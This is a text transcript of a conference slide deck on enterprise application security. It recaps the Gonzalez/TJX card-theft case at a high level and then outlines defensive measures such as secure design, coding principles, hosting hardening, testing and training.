application security - enterprise...
TRANSCRIPT
![Page 1: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/1.jpg)
Application Security –Enterprise Strategies
K. K. Mookhey, CISA, CISSP, CISM
www.niiconsulting.com
K. K. Mookhey, CISA, CISSP, CISMPrincipal Consultant
![Page 2: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/2.jpg)
Agenda
� The Biggest Hack in History
� How the Cookie Crumbles?
www.niiconsulting.com
� Answers!
![Page 3: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/3.jpg)
Speaker Introduction
� Founder & Principal Consultant, Network Intelligence
� Speaker at Blackhat 2004, Interop 2005, IT Underground 2005, OWASP Asia 2008,2009
� Co-author of book on Metasploit Framework
www.niiconsulting.com
� Co-author of book on Metasploit Framework (Syngress), Linux Security & Controls (ISACA)
� Author of numerous articles on SecurityFocus, IT Audit, IS Controls (ISACA)
� Conducted numerous pen-tests, application security assessments, forensics, etc.
![Page 4: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/4.jpg)
www.niiconsulting.com
THE BIGGEST HACK IN HISTORY
![Page 5: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/5.jpg)
Gonzalez, TJX and Heart-break-land
� >200 million credit card number stolen
� Heartland Payment Systems, TJX, and 2 US national retailers hacked
� Modus operandi
� Visit retail stores to understand workings
www.niiconsulting.com
� Visit retail stores to understand workings
� Analyze websites for vulnerabilities
� Hack in using SQL injection
� Inject malware
� Sniff for card numbers and details
� Hide tracks
![Page 6: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/6.jpg)
The hacker underground
� Albert Gonzalez
� a/k/a “segvec,”
� a/k/a “soupnazi,”
� a/k/a “j4guar17”
� Malware, scripts and hacked data hosted on servers in:
www.niiconsulting.com
� Malware, scripts and hacked data hosted on servers in:
� Latvia
� Netherlands
� IRC chats
� March 2007: Gonzalez “planning my second phase against Hannaford”
� December 2007: Hacker P.T. “that’s how [HACKER 2] hacked Hannaford.”
UkraineNew JerseyCalifornia
![Page 7: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/7.jpg)
Where does all this end up?
IRC Channels#cc#ccards#ccinfo#ccpower#ccs#masterccs
www.niiconsulting.com
� Commands used on IRC
� !cardable
� !cc, !cclimit, !chk, !cvv2, !exploit, !order.log, !proxychk
#masterccs#thacc#thecc#virgincc
![Page 8: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/8.jpg)
TJX direct costs
$24 million to
$41 million to Visa
$200 million in fines/penalties
www.niiconsulting.com
$24 million to Mastercard
![Page 9: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/9.jpg)
Cost of an incident
� $6.6 million average cost of a data breach
� From this, cost of lost business is $4.6 million
� More than $200 per compromised record
www.niiconsulting.com
On the other hand:
� Fixing a bug costs $400 to $4000
� Cost increases exponentially as time lapses
![Page 10: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/10.jpg)
How the Cookie Crumbles
www.niiconsulting.com
![Page 11: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/11.jpg)
www.niiconsulting.com
![Page 12: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/12.jpg)
www.niiconsulting.com
![Page 13: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/13.jpg)
www.niiconsulting.com
![Page 14: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/14.jpg)
www.niiconsulting.com
![Page 15: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/15.jpg)
www.niiconsulting.com
![Page 16: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/16.jpg)
www.niiconsulting.com
![Page 17: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/17.jpg)
www.niiconsulting.com
![Page 18: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/18.jpg)
www.niiconsulting.com
![Page 19: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/19.jpg)
www.niiconsulting.com
![Page 20: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/20.jpg)
www.niiconsulting.com
![Page 21: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/21.jpg)
Betting blind!
� DB Name
� Table Names
� User IDs
� Table Structure
� Data
www.niiconsulting.com
� Data
![Page 22: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/22.jpg)
Net Result
www.niiconsulting.com
Enterprise Owned!
![Page 23: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/23.jpg)
Other aspects
www.niiconsulting.com
![Page 24: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/24.jpg)
• App2App interaction requires an authentication process
– Calling application needs to send credentials to target application
• Common use cases
– Applications and Scripts connecting to databases
– 3rd Party Products accessing network resources
App2App Communication
www.niiconsulting.com
– 3rd Party Products accessing network resources
– Job Scheduling
– Application Server Connection Pools
– Distributed Computing Centers
– Application Encryption Key Management
– ATM, Kiosks, etc.
![Page 25: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/25.jpg)
Answers!
www.niiconsulting.com
![Page 26: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/26.jpg)
Technology Solutions
� Web Application Firewalls
� Privileged Identity Management Suites
www.niiconsulting.com
� Application-Aware Firewalls
� Application-Aware SIEMS
� Database Access Management Solutions
![Page 27: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/27.jpg)
Before we get to the technology…
www.niiconsulting.com
![Page 28: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/28.jpg)
Design
Application Security – Holistic Solution
www.niiconsulting.com
Develop/
Manage
Test
Train
![Page 29: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/29.jpg)
Secure Design
� Secure Designing Models
� Client Inputs
� Client Education
www.niiconsulting.com
� Client Education
� Threat Modeling
� Vulnerability Classification – STRIDE
� Risk Classification – DREAD
![Page 30: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/30.jpg)
Microsoft’s Threat Modeling Tool
www.niiconsulting.com
![Page 31: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/31.jpg)
Secure Coding Overview
Secure coding isn’t taught in school
� Homeland Security's Build Security In Maturity Model (BSIMM)
� Microsoft's Security Development Lifecycle
www.niiconsulting.com
� Microsoft's Security Development Lifecycle (SDL)
� OpenSAMM (Software Assurance Maturity Model)
� OWASP Secure Coding Guides
![Page 32: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/32.jpg)
Secure Coding Principles
1. Minimize attack surface area
2. Establish secure defaults
3. Principle of least privilege
4. Principle of defense in depth
5. Fail securely
www.niiconsulting.com
5. Fail securely
6. Don’t trust input – user or services
7. Separation of duties
8. Avoid security by obscurity
9. Keep security simple
10.Fix security issues correctly
![Page 33: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/33.jpg)
Vendor Management
� Big names != Good security
� Contractual weaknesses
www.niiconsulting.com
� Lack of vendor oversight
� No penalties for blatantly buggy code!
![Page 34: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/34.jpg)
Secure Hosting
� Web Security
� Secured web server
� Secured application server –all components
� Web application firewalls
� Database Security
� OS Security
� Security Patches
� Users and Groups
� Access Control
� Security Policies
� Secured Login
www.niiconsulting.com
� Database Security
� Security Patches
� Users and Roles
� Access Control
� Logging
� Password Security
� Database Table Encryption
� Data Masking
� Secured Login
� Logging
![Page 35: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/35.jpg)
Secure Testing
� Security testing options
� Blackbox
� Greybox
� Whitebox
� Source Code Review
www.niiconsulting.com
� OWASP Top Ten (www.owasp.org)
� OWASP Testing Guide
Tools of the tradeOpen source – Wikto, Paros, Webscarab, Firefox pluginsCommercial – Acunetix, Cenzic, Netsparker, Burpsuite
![Page 36: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/36.jpg)
Training
� Back to basics
� Natural thought process
www.niiconsulting.com
� Look at larger picture
� Make it fun
� Giving back to the community
![Page 37: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/37.jpg)
Design
Application Security Vision
www.niiconsulting.com
Develop/
Manage
Test
Train
![Page 38: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/38.jpg)
Thank you!Questions?
Information Security Institute of Information
www.niiconsulting.com
Information Security Consulting Services
Institute of Information Security